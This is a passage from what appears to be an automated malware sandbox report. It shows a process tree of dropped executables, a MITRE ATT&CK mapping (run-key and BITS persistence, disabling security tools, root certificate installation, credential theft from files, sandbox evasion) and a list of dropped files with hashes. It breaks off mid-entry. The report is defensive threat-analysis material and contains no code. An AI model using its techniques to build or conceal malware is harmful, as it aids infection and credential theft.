                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EC8D.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EC8D.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5168
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\381.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\381.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4196
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\381.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\381.exe
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5416
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\140C.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\140C.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2192
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\140C.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\140C.exe
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:6036
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\524F.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\524F.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1428
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5D5C.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5D5C.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:6052
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\676F.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\676F.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3632
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7347.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7347.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4736
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:3380
                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:368
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:6068
                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1968
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4328
                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1228
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:2192
                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5440
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5484

                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1222

                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\libcurl.dll
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\libcurlpp.dll
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\libstdc++-6.dll
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\libwinpthread-1.dll
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\setup_install.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\setup_install.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_1.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_1.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_1.txt
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_2.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_2.txt
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_3.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_3.txt
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_4.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_4.txt
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_5.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_5.txt
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_6.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_6.txt
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      f44faa2a71dde2950aad23ac0e606e54

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      093446d49ad042791d87eb0fbeed48f405e2772a

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      6d44814d7e052696c7c6bdbb547d947c63ba20dd0984fc7f779029e39a813d53

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      b8e85fc836643e4d9d9573bdbfb1452f55fa8533242430becb56c52694be2973851f4e95dabe62e074525d8a68e2586deae68f01e86579303e54489ad05dda3f

                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      f44faa2a71dde2950aad23ac0e606e54

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      093446d49ad042791d87eb0fbeed48f405e2772a

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      6d44814d7e052696c7c6bdbb547d947c63ba20dd0984fc7f779029e39a813d53

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      b8e85fc836643e4d9d9573bdbfb1452f55fa8533242430becb56c52694be2973851f4e95dabe62e074525d8a68e2586deae68f01e86579303e54489ad05dda3f

                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      001919e17b2e2fee7b74dd6058658047

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      482f4e7165e97eee550f12d2ba5e48f407580172

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8c827810f02e75f07007ed562147c79d8c4cc1ed448d365b3a198a4f318cfa0f

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      81906315de87b82a1d8e0de59556cb1d5a2e0c4fa4547ef2827bf96a0a99e0b41469d0ca9d62f405af7243b8d1745370c52838363a9389584e9e7cb8200960eb

                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\8kXFln6SdnDJ9gbwdfd5Mldd.exe
                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      91bf0ee9195a7b21e5d8de66072bad70

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      a29e413f89d283acc5a2751159426c83ad3b4764

                                                                                                                                                                                                                                                      SHA256

